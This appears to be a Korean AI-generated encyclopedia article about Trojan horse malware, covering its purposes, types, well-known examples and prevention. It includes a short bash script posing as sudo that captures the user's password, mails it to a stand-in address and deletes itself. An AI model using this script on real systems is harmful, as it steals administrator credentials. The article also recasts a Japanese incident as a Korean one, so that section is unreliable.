맨위로가기

트로이 목마 (컴퓨팅)

"오늘의AI위키"는 AI 기술로 일관성 있고 체계적인 최신 지식을 제공하는 혁신 플랫폼입니다.
"오늘의AI위키"의 AI를 통해 더욱 풍부하고 폭넓은 지식 경험을 누리세요.
목차

1. 개요

트로이 목마 (컴퓨팅)는 사용자가 실행하도록 유도하여 시스템에 침투하는 악성 프로그램이다. 설치 후 다양한 악성 행위를 수행하며, 파괴, 자원 사용, 금전 절도, 데이터 절도, 감시, 스토킹 등 여러 가지 목적을 가질 수 있다. 백도어, 비밀번호 절도형, 클릭커형, 다운로더형, 드롭퍼형, 프록시형, 광고형 등 다양한 종류가 있으며, 넷버스, 백 오리피스, 제우스 등이 대표적이다. 대응 및 예방을 위해서는 백신 소프트웨어 최신 유지, 출처 불분명 파일 실행 금지, 운영체제 및 소프트웨어 업데이트, 보안 패치 적용, 방화벽 활성화 등이 필요하다.

더 읽어볼만한 페이지

  • 트로이 목마 - 원격 관리 도구
    원격 관리 도구는 원격 시스템을 제어하고 감시하는 소프트웨어로, 악성 소프트웨어인 RAT나 트로이 목마 형태로 존재하며, 백 오리피스, NetBus, PoisonIvy, DarkComet 등이 있다.
  • 트로이 목마 - 뻐꾸기 알
    《뻐꾸기 알》은 1986년 클리포드 스톨이 75센트의 회계 오류를 추적하다가 KGB에 정보를 판매한 서독 해커 마르쿠스 헤스를 추적한 해킹 사건을 다룬다.
  • 사회공학 (보안) - 가짜뉴스
    가짜 뉴스는 뉴스 형식을 띠지만 허위이거나 오도된 정보를 의미하며, 정치적, 경제적 동기를 가지고 인터넷과 소셜 미디어를 통해 확산되며, 사회적 분열과 민주주의를 위협하는 부정적인 효과를 초래한다.
  • 사회공학 (보안) - 스미싱
    스미싱은 악성 앱 설치를 유도해 개인정보를 빼내는 사기 수법으로, 안드로이드 사용자는 "알 수 없는 소스" 옵션 설정을 변경하거나 스미싱 차단 앱을 설치하여 예방할 수 있다.
  • 스파이웨어 - 키로깅
    키로깅은 키보드 입력 내용을 몰래 기록하는 행위 또는 소프트웨어/하드웨어를 의미하며, 악성 소프트웨어와 결합하여 개인 정보 탈취에 악용되는 사례가 증가하고 있어 대응 기술 및 수사 활용이 연구되고 있다.
  • 스파이웨어 - 백도어
    백도어는 시스템 보안을 우회하여 특정 기능에 접근하도록 의도적으로 만들어진 통로로, 악의적 사용자에 의해 무단 접근 및 정보 탈취에 악용될 수 있으며, 웜이나 트로이 목마 형태로 나타나 개인 정보 유출 및 시스템 제어 탈취와 같은 심각한 보안 문제를 야기한다.
트로이 목마 (컴퓨팅)

2. 목적과 사용

트로이 목마는 공격자의 의도에 따라 다양한 악성 행위를 수행할 수 있다. 일반적으로 설치되면 제한 없는 접근 권한을 가지며, 이를 통해 공격자는 여러 가지 작업을 수행한다.[4]

트로이 목마는 주로 인터넷을 통해 명령 및 제어(C2) 서버에 연결하여 지시를 기다린다. 이때 특정 포트 세트를 사용하여 통신하므로 비교적 탐지가 쉽다. 또한, 다른 멀웨어가 트로이 목마를 "인수"하여 악의적인 행위를 수행하기도 한다.[9]

독일어권 국가에서는 정부에서 사용하거나 만든 스파이웨어를 ''govware''라고 부른다. Govware는 대상 컴퓨터의 통신을 가로채는 데 사용되는 트로이 목마 소프트웨어이다. 스위스, 독일 등 일부 국가에서는 이러한 소프트웨어 사용을 규제하는 법적 틀을 가지고 있다.[10][11]

비트디펜더의 2009년 조사에 따르면, 트로이 목마 유형의 멀웨어가 증가하여 전 세계 멀웨어의 83%를 차지한다. 트로이 목마는 웜과 함께 인터넷을 통해 확산되기도 한다.[14] 비트디펜더는 컴퓨터의 약 15%가 봇넷의 구성원이라고 밝혔다.[15]

트로이 목마는 프로그램, 실행 형식 파일을 통해 전달되어 악의적인 동작을 시작하는 경우가 많다. 실행되면 하드 디스크나 메모리에 자신을 복제, 설치하고, 윈도우 레지스트리를 변경한다. 또한, 방화벽 설정을 변경하여 공격자가 지정하는 포트를 열어 외부 접속을 허가한다. 이를 통해 공격자는 키로깅, 프로그램 및 파일 추가/삭제, 백신 소프트웨어 비활성화, 화면 촬영, 비밀번호 탈취, 악성 프로그램 다운로드 등 다양한 피해를 입힌다.

2005년 일본에서는 은행을 사칭하여 악성 소프트웨어를 심은 CD-ROM을 인터넷 뱅킹 사용자에게 보내 불법 송금을 실행시킨 사건이 있었다. 이는 스파이웨어로 보도되기도 했지만, 악성 소프트웨어 분류상 트로이 목마에 해당한다.

2. 1. 파괴적 목적


  • 시스템 충돌을 일으킨다.
  • 파일 수정 및 파일 삭제를 한다.
  • 데이터를 오염시킨다.
  • 모든 내용을 지우는 디스크 포맷을 수행한다.
  • 네트워크로 악성코드를 전파한다.
  • 사용자의 행동을 감시하고 민감한 정보에 접근한다.[33]

2. 2. 자원이나 신분의 사용

트로이 목마에 감염된 컴퓨터는 다양한 악성 행위에 동원될 수 있다. 감염된 컴퓨터는 봇넷의 일부가 되어 분산 서비스 거부 공격(DDoS)에 사용되거나, 암호화폐 채굴에 동원될 수 있다.[34] 또한, 프록시 서버로 이용되어 다른 컴퓨터를 공격하거나 불법적인 행위를 하는 데 사용될 수 있다.[9]

트로이 목마는 인터넷을 통해 명령 및 제어 (C2) 서버에 연결하여 지시를 기다리며, 특정 포트 세트를 사용하여 통신하기 때문에 비교적 탐지가 쉽다. 다른 멀웨어가 트로이 목마를 이용하여 악의적인 행위를 수행하기도 한다.[9]

최근에는 트로이 목마 방식이 클라우드 컴퓨팅 시스템 공격에도 사용된다. 공격자는 트로이 목마를 통해 악성 프로그램이나 서비스를 클라우드 시스템에 삽입하여 기능을 변경하거나 중단시켜 클라우드 서비스에 영향을 줄 수 있다.[16]

2. 3. 금전 절도 및 랜섬웨어

트로이 목마는 전자화폐를 훔치거나 크립토라커와 같은 랜섬웨어를 설치하여 사용자에게 금전을 요구한다.[1]

2. 4. 데이터 절도

트로이 목마는 다음과 같은 정보를 몰래 빼돌리는 데 사용될 수 있다.

종류설명
기밀 정보도면, 군사 정보, 사회 기반 시설 정보 등
금융 정보사용자의 비밀번호나 체크카드 정보 등
개인 정보개인 정보, 개인 신용 정보 등
영상 정보CCTV, IP 카메라 등


2. 5. 감시 및 스토킹

트로이 목마는 사용자의 정보를 수집하고 감시하는 데 사용될 수 있다. 주요 기능은 다음과 같다.

  • 키로깅
  • 웹캠을 통한 사용자 감시
  • 원격 관리: 원격 제어형 트로이 목마는 악성 코드 제어자와 상호 작용하여 작동한다. 네트워크를 스캔하여 트로이 목마가 설치된 컴퓨터를 찾고, 해커가 원격으로 제어할 수 있다.

3. 작동 방식

트로이 목마는 정상적인 프로그램으로 위장하여 사용자가 의심 없이 설치하도록 유도한다. 설치된 트로이 목마는 공격자에게 시스템에 대한 제한 없는 접근 권한을 부여하며, 공격자는 이 권한을 이용해 다양한 악성 행위를 수행한다.[4]

트로이 목마라는 용어와 개념은 1971년 유닉스 매뉴얼에서 처음 언급되었으며,[4] 1974년 미국 공군 보고서에서도 Multics 컴퓨터 시스템의 취약성 중 하나로 언급되었다.[5] 켄 톰슨은 1983년 튜링상 수상 강연에서 트로이 목마의 위험성을 언급하며 이 개념을 대중화했다.[6]

트로이 목마는 ''정당한 기능을 수행하는 것처럼 보이지만 실행 시 사용자의 보안을 손상시키는 컴퓨터 프로그램''이다.[17] 예를 들어, 악성 버전의 리눅스 sudo 명령은 관리자의 비밀번호를 탈취하여 공격자에게 전송할 수 있다.

```sh

#!/usr/bin/env bash

# 화면에 문자 에코를 끄기. sudo는 사용자가 비밀번호를 입력할 때 화면에 표시되지 않도록 한다.

stty -echo

# 사용자에게 비밀번호를 묻고 입력을 받음. 3번 반복한다.

prompt_count=1

while [ $prompt_count -le 3 ]; do

echo -n "[sudo] password for $(whoami): "

read password_input

echo

sleep 3 # sudo는 반복된 프롬프트 사이에 일시 중지한다.

prompt_count=$(( prompt_count + 1 ))

done

# 문자 에코를 다시 켬.

stty echo

echo $password_input | mail -s "$(whoami)'s password" outside@creep.com

# sudo의 실제 오류 메시지를 표시한 다음 자신을 삭제한다.

echo "sudo: 3 incorrect password attempts"

rm $0

exit 1

```

이러한 트로이 목마를 방지하기 위해 `PATH` 환경 변수를 설정할 때 `.` 항목을 끝에 위치시키는 것이 좋다.[18]

최근에는 클라우드 컴퓨팅 시스템을 공격하는 데에도 트로이 목마 방식이 사용되고 있다.[16]

독일어를 사용하는 국가에서는 정부에서 만든 스파이웨어를 'govware'라고 부르며, 이는 대상 컴퓨터의 통신을 가로채는 트로이 목마 소프트웨어이다.[10] 스위스의 미니판처와 메가판처,[12] 독일의 "국가 트로이 목마" R2D2[10] 등이 govware의 예시이다.

3. 1. 위장 수법

트로이 목마는 그 성질상 피해자가 프로그램을 실행하도록 해야 한다. 따라서 위험을 감지할 수 있는 수상한 파일명이나 아이콘은 사용하지 않는다. 예를 들어 동영상 재생 코덱설치 프로그램, 백신 소프트웨어, 미디어 플레이어 등으로 위장하여 사용자가 다운로드 및 설치하도록 유도한다.

일부 윈도우용 트로이 목마는 윈도우의 기본 설정인 확장자가 표시되지 않는 설정을 악용하기도 한다. 의도적으로 파일명 끝에 .jpg, .mp3, .avi, .zip 등 이미지, 음성, 동영상, 아카이브 형식의 확장자명을 붙이고, 마지막에 .exe(실행 파일)를 붙이는 방식이다. 또한, 일반적으로 화면 보호기 용도로만 사용되는 확장자 .scr이나, 배치 처리 파일 확장자 .bat, VBScript의 확장자 .vbs 등으로 위장하기도 한다.[17]

3. 2. 설치 후 동작

트로이 목마는 설치된 후 은밀하게 작동하며, 사용자의 동의 없이 다양한 악성 행위를 수행한다. 많은 트로이 목마는 인터넷을 통해 명령 및 제어(C2) 서버에 연결하여 지시를 기다린다.[9] 이 통신에는 특정 포트가 사용되므로, 트로이 목마를 비교적 쉽게 탐지할 수 있다.

트로이 목마는 주로 다음과 같은 악성 행위를 수행한다.[9]

  • 레지스트리 변경, 삭제, 추가
  • 방화벽 설정 변경 및 특정 포트 개방
  • 키로깅을 통한 정보 탈취
  • 프로그램 및 파일 추가/삭제
  • 백신 소프트웨어 비활성화
  • 데스크톱 화면 촬영
  • 비밀번호 탈취
  • 악성 프로그램 다운로드


트로이 목마는 봇넷의 일부가 되어 공격자의 제어를 받으며, 개인 정보 유출, 시스템 파괴, 금전적 피해 등 다양한 문제를 일으킬 수 있다. 2005년에는 일본에서 은행을 사칭한 CD-ROM을 통해 트로이 목마를 유포하여 인터넷 뱅킹 서비스 사용자의 돈을 빼돌린 사건이 발생하기도 했다.

4. 종류

트로이 목마는 기능과 목적에 따라 다양한 종류로 분류된다. 자주 보이는 유형은 다음과 같다.


  • 시스템 충돌을 일으킨다.
  • 파일을 수정하거나 삭제한다.
  • 데이터를 오염시킨다.
  • 디스크 포맷을 실행해 모든 내용을 지운다.
  • 네트워크를 통해 악성코드를 전파한다.
  • 사용자의 행동을 감시하고 민감한 정보에 접근한다.[33]
  • 컴퓨터를 봇넷으로 만들어 분산 서비스 거부 공격 등에 악용한다.
  • 암호화폐 채굴에 컴퓨터 자원을 사용한다.[34]
  • 감염된 컴퓨터를 프록시 서버로 사용해 다른 컴퓨터를 공격하거나 불법적인 행동을 한다.
  • 네트워크에 연결된 다른 장치를 감염시킨다.
  • 전자화폐를 훔친다.
  • 크립토락커와 같은 랜섬웨어를 설치한다.
  • 도면, 군사 정보, 사회 기반 시설 정보 등 기밀 정보를 빼낸다.
  • 사용자의 비밀번호나 체크카드 정보를 훔친다.
  • 개인 정보, 개인 신용 정보를 유출한다.
  • CCTV, IP 카메라 등 영상 정보를 탈취한다.


위에 언급된 기능 외에도 트로이 목마는 다양한 악의적인 기능을 수행할 수 있다.

4. 1. 백도어형 (RAT)

백도어는 사용자의 인지 없이 설치되어 실행되는 원격 조작 프로그램으로, 가장 위험한 트로이 목마 유형 중 하나이다. 크래커나 해커 사이에서는 "RAT"(Remote Administration Tool, 원격 관리 도구)라고도 불린다. 백도어는 운영체제(OS)의 관리자 권한을 가진 것처럼 행동하기 때문에 다른 트로이 목마에 비해 탐지율이 낮은 편이다. 일반적인 원격 조작 프로그램과 다른 점은 사용자 몰래 설치 및 실행된다는 점이며, 프로그램 자체의 기능은 일반적인 원격 조작 프로그램과 큰 차이가 없다.

대표적인 백도어의 기능은 다음과 같다.

  • 외부에서 모든 명령어를 실행[35]
  • 사용자 화면 촬영[35]
  • 프로그램 및 데이터 파일 실행, 중지, 삭제[35]
  • 사용자의 하드 디스크에 파일 및 프로그램 업로드/다운로드[35]
  • 키로깅[35]
  • 사용자의 웹캠 보기[35]
  • 사용자의 컴퓨터 원격 관리[35]

4. 2. 비밀번호 절도형 (PSW)

비밀번호 절도형 트로이 목마(PSW)는 사용자의 컴퓨터에 몰래 설치되어 다양한 정보를 훔쳐 공격자에게 전송하는 악성 프로그램이다. 주로 훔치는 정보는 다음과 같다.[9]

정보 종류상세 내용
온라인 계정 정보온라인 뱅킹, 신용카드 계정 정보 등
시스템 정보OS의 BIOS 비밀번호, 관리자 권한 비밀번호 (Linux의 경우 루트 권한), MAC 주소, 로컬 및 글로벌 IP 주소



이러한 정보 유출은 컴퓨터의 제어권을 완전히 잃게 만들 수 있다. 비밀번호 절도형 트로이 목마는 파일 크기가 비교적 작은 경우가 많다.[9]

4. 3. 클리커형

클리커형 트로이 목마는 실행되면 레지스트리를 변경하거나 추가하고, 웹 브라우저의 보안 허점을 악용하는 익스플로잇을 사용하여 원래 관리자 권한으로만 변경할 수 있는 설정을 변경한다. 이를 통해 피해자의 컴퓨터가 시작되거나 인터넷에 접속할 때마다 공격자가 지정한 특정 웹사이트에 접속하도록 유도한다.

이러한 트로이 목마의 주된 목표는 다음과 같다.

  • 특정 웹사이트의 접속 수를 늘려 광고 수익을 올린다.
  • 특정 사이트에 접속 요청을 집중시켜 DoS, DDoS 공격을 실행한다.
  • 악성 소프트웨어를 다운로드하도록 유도한다.


클리커형 트로이 목마 파일 크기는 대개 매우 작으며(2-10KB), 봇넷의 인기로 인해 점점 더 흔해지고 있다.

4. 4. 다운로더형

다운로더형 트로이 목마는 공격자가 의도한 특정 웹사이트에 접속하여 악성 프로그램을 다운로드하려 시도한다. 다운로드에 성공하면, 그 악성 프로그램을 피해자의 동의 없이 순차적으로 실행한다. 실행과 동시에 악성 프로그램이 OS 부팅 시 자동으로 실행되도록 레지스트리 정보 변조, 뮤텍스 객체 생성을 수행한다. 이 종류 역시, 일반적으로 파일 크기가 작은 경우가 많다.[9]

4. 5. 드롭퍼형

드롭퍼형 트로이 목마는 자체적으로 악성코드를 내장하고 있으며, 이를 몰래 설치하고 실행하는 데 사용된다.[17]

이러한 유형의 트로이 목마는 다운로더와 달리 인터넷에서 프로그램을 다운로드하지 않는다. 대신 악성 코드가 드롭퍼 자체에 포함되어 있다. 드롭퍼형 트로이 목마는 대개 실행 역할을 하는 프로그램과 여러 개의 악성 프로그램 파일로 구성된다.

4. 6. 프록시형

트로이 목마의 프록시형은 실행되면 피해자의 라우터DNS 설정을 무단으로 변경하여 피해자의 컴퓨터에 프록시 서버를 구축한다. 공격자의 인터넷 접속은 모두 이 트로이 목마를 실행한 머신을 경유하게 되므로, 공격자는 익명성을 높일 수 있다. 한편, 피해자는 자신의 IP 주소가 하이테크 범죄에 악용되므로, 자신도 모르는 사이에 하이테크 범죄의 가해자가 되는 경우도 적지 않다. 이처럼 공격자가 프록시 서버로 악용하는 머신을 봇넷이라고도 한다.

4. 7. 광고형

광고형은 일반적인 광고로 위장하여 바이러스가 포함된 광고를 표시하고, 보안 취약점을 이용하여 침투해 기기에 악영향을 미친다.

5. 대표적인 트로이 목마

다음은 대표적인 트로이 목마 프로그램들이다.


  • 넷버스(Netbus) - 12345번 포트를 사용하며, 사용과 유포가 비교적 쉬운 편에 속한다.[20]
  • 백 오리피스(Back Orifice) - 31337번 포트를 사용하며, 가장 널리 알려져 있어 제거 도구도 많이 개발되었다.
  • 스쿨버스(Schoolbus) - 54321번 포트를 사용한다.
  • Executor - 80번 포트를 사용하며, 감염된 컴퓨터의 시스템 파일을 삭제하거나 시스템을 파괴하는 기능을 가졌다.
  • Silencer - 1001번 포트를 사용하며, 제거 도구는 아직 개발되지 않았다.
  • Striker - 2565번 포트를 사용하며, 감염된 컴퓨터의 하드디스크를 손상시켜 부팅을 불가능하게 만든다.

5. 1. 사적 및 정부 주도 개발


  • ANOM - FBI이 개발한 암호화 메신저로, 범죄자 소탕에 활용되었다.
  • 0zapftis / r2d2 StaatsTrojaner - 독일 DigiTask에서 개발한 정부용 감시 소프트웨어이다. 독일어권 국가에서는 정부에서 사용하거나 만든 스파이웨어를 종종 ''govware''라고 부르는데, R2D2는 그 예시 중 하나이다.[10]
  • 핀피셔 - Lench IT solutions / Gamma International에서 개발한 감시 소프트웨어이다.
  • DaVinci / Galileo RCS - 해킹 팀(HackingTeam)에서 개발한 원격 제어 시스템이다.
  • 매직 랜턴 - FBI가 개발한 키로깅 소프트웨어이다.
  • SUNBURST - SVR/코지 베어(추정) 해킹 그룹이 2020년 미국 연방 정부를 대상으로 수행한 공급망 공격에 사용된 악성코드이다.
  • TAO QUANTUM/FOXACID - NSA의 맞춤형 접근 작전(TAO)에서 사용하는 공격 도구이다.
  • WARRIOR PRIDE - GCHQ(영국 정부 통신 본부)에서 사용하는 감시 도구이다.

5. 2. 공개적으로 사용 가능


  • 넷버스(Netbus) – 1998년에 발표된 원격 제어 도구이다.[20]
  • 서브7(Sub7) – 1999년에 발표된 원격 제어 도구이다.
  • 백 오리피스(Back Orifice) – 1998년에 발표된 원격 제어 도구이다.
  • Y3K – 2000년에 발표된 원격 제어 도구이다.
  • 비스트(Beast) – 2002년에 발표된 원격 제어 도구이다.
  • 비프로스트 트로이 목마(Bifrost Trojan) – 2004년에 발표된 원격 제어 도구이다.
  • 다크코멧(DarkComet) – 2008년부터 2012년까지 개발된 원격 제어 도구이다.
  • 블랙홀 익스플로잇 키트(Blackhole exploit kit) – 2012년에 발표된 익스플로잇 키트이다.
  • 고스트 RAT(Gh0st RAT) – 2009년에 발표된 원격 제어 도구이다.
  • 메가판처 분데스 트로야너(MegaPanzer BundesTrojaner) – 2009년에 발표된 독일 정부용 트로이 목마이다.[21][22]
  • MEMZ – 2016년에 Leurak이 장난을 목적으로 만든 트로이 목마이다.

5. 3. 보안 연구원들에 의해 발견

이름설명발견 연도
트웰브 트릭스트로이 목마[14]1990년
클릭봇.A봇넷[14]2006년
제우스뱅킹 트로이 목마[14]2007년
플래시백 트로이 목마맥 OS X 대상 트로이 목마[14]2011년
제로액세스봇넷[14]2011년
쿱페이스소셜 네트워크 웜[14]2008년
분도애드웨어[14]2009년
코어플러드봇넷[14]2010년
타이니 뱅커 트로이 목마뱅킹 트로이 목마[14]2012년
SOVA안드로이드 뱅킹 트로이 목마[14]2022년
셰둔 안드로이드 멀웨어안드로이드 애드웨어[14]2015년


6. 한국 관련 사례

2005년, 한국에서도 은행을 사칭한 CD-ROM을 통해 악성코드를 유포, 인터넷 뱅킹 서비스 사용자에게 불법 송금을 실행시킨 사건이 발생했다. 일부 매스 미디어에서는 스파이웨어라고 보도했지만, 악성 소프트웨어 분류상으로는 트로이 목마가 맞다. 같은 해 11월, 소니 BMG가 복제 방지 CD에 루트킷 형태의 멀웨어를 심었다는 문제(소니 BMG CD XCP 문제)가 발생했다.

7. 대응 및 예방

트로이 목마에 대응하고 예방하려면 컴퓨터 사용자의 주의가 필요하다. 출처가 불분명한 이메일의 첨부 파일이나 링크를 함부로 열거나, 신뢰할 수 없는 웹사이트에서 파일을 다운로드하거나 실행하는 것을 피해야 한다.

안티바이러스 소프트웨어를 설치하고 최신 버전으로 유지하는 것은 기본이다. 알려진 트로이 목마는 대부분 안티바이러스 소프트웨어를 통해 탐지 및 삭제가 가능하다. 하지만 매일 새로운 트로이 목마와 변종이 만들어지므로, 안티바이러스 소프트웨어 업데이트는 필수적이다. 일부 안티바이러스 소프트웨어는 휴리스틱 검사 기능을 통해 알려지지 않은 트로이 목마를 탐지하기도 한다.

운영체제와 소프트웨어를 최신 버전으로 업데이트하고 보안 패치를 적용하는 것도 중요하다. 방화벽을 활성화하고 불필요한 포트는 차단하며, 강력한 비밀번호를 사용하고 주기적으로 변경하는 것이 좋다. 보안 전문가의 도움을 받아 시스템 보안을 강화하는 것도 고려해 볼 수 있다.

7. 1. 알려진 트로이 목마

알려진 트로이 목마는 안티바이러스 회사나 보안 전문가에 의해 이미 해당 트로이 목마에 대한 상세 정보(행동, 파일 크기, 작성된 언어 등)가 파악된 경우를 말한다. 이러한 경우, 최신 상태로 업데이트된 주요 안티바이러스 소프트웨어를 통해 쉽게 탐지 및 삭제할 수 있는 경우가 많다. 하지만 완전히 삭제되지 않는 경우도 있다.[17]

7. 2. 알려지지 않은 트로이 목마

트로이 목마는 매일 엄청난 수의 신종 및 변종이 생성되므로, 전문가의 분석에는 시간이 걸린다. 따라서 일반 사용자는 안티바이러스 소프트웨어의 업데이트를 통해 알려진 트로이 목마를 탐지하는 경우가 많다.

일부 안티바이러스 소프트웨어는 휴리스틱 스캔 기능을 통해 "미지의 트로이 목마"를 탐지하기도 한다.

운영체제 및 소프트웨어를 최신 버전으로 업데이트하고 보안 패치를 적용해야 한다. 또한, 방화벽을 활성화하고 불필요한 포트는 차단하며, 강력한 비밀번호를 사용하고 주기적으로 변경하는 것이 중요하다. 보안 전문가의 도움을 받아 시스템 보안을 강화하는 것도 좋은 방법이다.

7. 3. 오탐지 사례

Generic.dx는 복제 방지 관련 인증 파일을 감지하기 위한 엔진 프로그램으로, Picasa 2 등에 포함되어 있다. 맥아피의 "Active Protection"으로 스캔할 때 가끔 "트로이 목마"로 오탐지되는 경우가 있었다. 이는 동명의 바이러스가 있기 때문이며, 해당 파일을 삭제해도 소프트웨어 작동에는 문제가 없다.[1]

8. 용어

"트로이 목마"라는 용어와 개념이 언제 어디서 처음 사용되었는지는 명확하지 않지만, 1971년 최초의 유닉스 매뉴얼에서는 독자들이 이미 이 용어와 개념을 알고 있다고 가정했다.[4]

1974년 Multics 컴퓨터 시스템의 취약성을 분석한 미국 공군 보고서에서도 이 용어가 언급되었다.[5]

이 용어는 켄 톰슨이 1983년 튜링상 수상 강연 "신뢰에 대한 고찰"[6]에서 언급하면서 대중화되었다. 강연의 부제는 "프로그램에 트로이 목마가 없다는 말을 어느 정도까지 신뢰해야 하는가? 아마도 소프트웨어를 작성한 사람을 신뢰하는 것이 더 중요할 것이다."였다. 톰슨은 Multics 보안 보고서를 통해 트로이 목마의 존재 가능성을 알게 되었다고 밝혔다.[7][8]

"트로이 목마"라는 컴퓨터 용어는 고대 도시 트로이의 전설적인 트로이 목마에서 유래했다. 그래서 "Trojan"은 대문자로 표기하는 경우가 많지만, 스타일 가이드와 사전마다 차이가 있으며, 많은 곳에서 일반적인 사용에는 소문자 "trojan" 사용을 권장한다.[30][31]

참조

[1] 웹사이트 Trojan Horse Definition http://www.techterms[...] 2012-04-05
[2] 웹사이트 Difference between viruses, worms, and trojans https://knowledge.br[...] Broadcom Inc. 2020-03-29
[3] 웹사이트 VIRUS-L/comp.virus Frequently Asked Questions (FAQ) v2.00 (Question B3: What is a Trojan Horse?) http://faqs.cs.uu.nl[...] 1995-10-09
[4] 웹사이트 Unix Programmer's Manual, November 3, 1971 https://www.bell-lab[...] 2020-03-28
[5] 간행물 Multics Security Evaluation: Vulnerability Analysis , ESD-TR-74-193 http://csrc.nist.gov[...] 2017-12-24
[6] 논문 Reflection on Trusting Trust https://dl.acm.org/f[...] 1984
[7] 간행물 Thirty Years Later: Lessons from the Multics Security Evaluation https://www.acsac.or[...] 2002
[8] 간행물 On Trusting Trust. 1989-11
[9] 보고서 Deconstructing SubSeven, the Trojan Horse of Choice http://www.sans.org/[...] SANS Institute 2003
[10] 문서 Trojan Horse Resurrected: On the Legality of the Use of Government Spyware (Govware) http://www.zora.uzh.[...] 2013
[11] 웹사이트 Häufig gestellte Fragen (Frequently Asked Questions) http://www.ejpd.admi[...] Federal Department of Justice and Police
[12] 웹사이트 Swiss coder publicises government spy Trojan http://news.techworl[...] 2009-08-27
[13] 웹사이트 German federal police use trojan virus to evade phone encryption http://www.dw.com/en[...] 2018-04-14
[14] 웹사이트 BitDefender Malware and Spam Survey finds E-Threats Adapting to Online Behavioral Trends http://news.bitdefen[...] 2020-03-27
[15] 웹사이트 What are Trojans? http://securaid.com/[...] 2014-08-07
[16] 논문 Trojan Horse Infection Detection in Cloud Based Environment Using Machine Learning https://online-journ[...] 2022-12-20
[17] 서적 UNIX System Security Hayden Books
[18] 서적 UNIX System Security Hayden Books
[19] 웹사이트 What's wrong with having '.' in your $PATH? https://cets.seas.up[...] Penn Engineering 2023-11-28
[20] 보고서 "Is it still a Trojan horse or an Actual Valid Remote Control Administration Tool?" https://www.sans.org[...] SANS Institute 1998
[21] 웹사이트 Mega-Panzer https://sourceforge.[...] 2016-09-21
[22] 웹사이트 Mini-Panzer https://sourceforge.[...] 2016-09-18
[23] 웹사이트 What is Sova virus? https://www.indiatod[...] 2022-09-16
[24] 웹사이트 Trojanized adware family abuses accessibility service to install whatever apps it wants – Lookout Blog https://blog.lookout[...]
[25] 웹사이트 Shedun trojan adware is hitting the Android Accessibility Service http://www.theinquir[...] Incisive Business Media 2015-11-20
[26] 웹사이트 Lookout discovers new trojanized adware; 20K popular apps caught in the crossfire – Lookout Blog https://blog.lookout[...]
[27] 웹사이트 Shuanet, ShiftyBug and Shedun malware could auto-root your Android https://betanews.com[...] 2015-11-05
[28] 웹사이트 New Family of Android Malware Virtually Impossible To Remove: Say Hello To Shedun, Shuanet And ShiftyBug http://www.techtimes[...] 2015-11-09
[29] 웹사이트 Android adware can install itself even when users explicitly reject it https://arstechnica.[...] 2015-11-19
[30] 웹사이트 trojan https://www.collinsd[...] 2020-03-29
[31] 웹사이트 trojan horse https://docs.microso[...] Microsoft 2020-03-29
[32] 웹인용 What is the difference between viruses, worms, and Trojans? http://www.symantec.[...] Symantec Corporation 2009-01-10
[33] 웹인용 Hackers, Spyware and Trojans – What You Need to Know https://www.comodo.c[...] Comodo 2015-09-05
[34] 문서 Trojan Turns Your PC Into Bitcoin Mining Slave http://www.wired.com[...] 2013
[35] 뉴스 Trojan Horse in SpyWareLoop.com http://www.spywarelo[...] 2013-07-11
[36] 간행물 Trojan Horse Resurrected: On the Legality of the Use of Government Spyware (Govware) http://www.zora.uzh.[...] LISS 2013
[37] 웹인용 Dokument nicht gefunden! http://www.ejpd.admi[...] Federal Department of Justice and Police 2015-10-27
[38] 웹사이트 BitDefender.com Malware and Spam Survey http://news.bitdefen[...] 2009-08-08
[39] 웹인용 What are Trojans? http://securaid.com/[...] 2015-10-27


본 사이트는 AI가 위키백과와 뉴스 기사,정부 간행물,학술 논문등을 바탕으로 정보를 가공하여 제공하는 백과사전형 서비스입니다.
모든 문서는 AI에 의해 자동 생성되며, CC BY-SA 4.0 라이선스에 따라 이용할 수 있습니다.
하지만, 위키백과나 뉴스 기사 자체에 오류, 부정확한 정보, 또는 가짜 뉴스가 포함될 수 있으며, AI는 이러한 내용을 완벽하게 걸러내지 못할 수 있습니다.
따라서 제공되는 정보에 일부 오류나 편향이 있을 수 있으므로, 중요한 정보는 반드시 다른 출처를 통해 교차 검증하시기 바랍니다.

문의하기 : help@durumis.com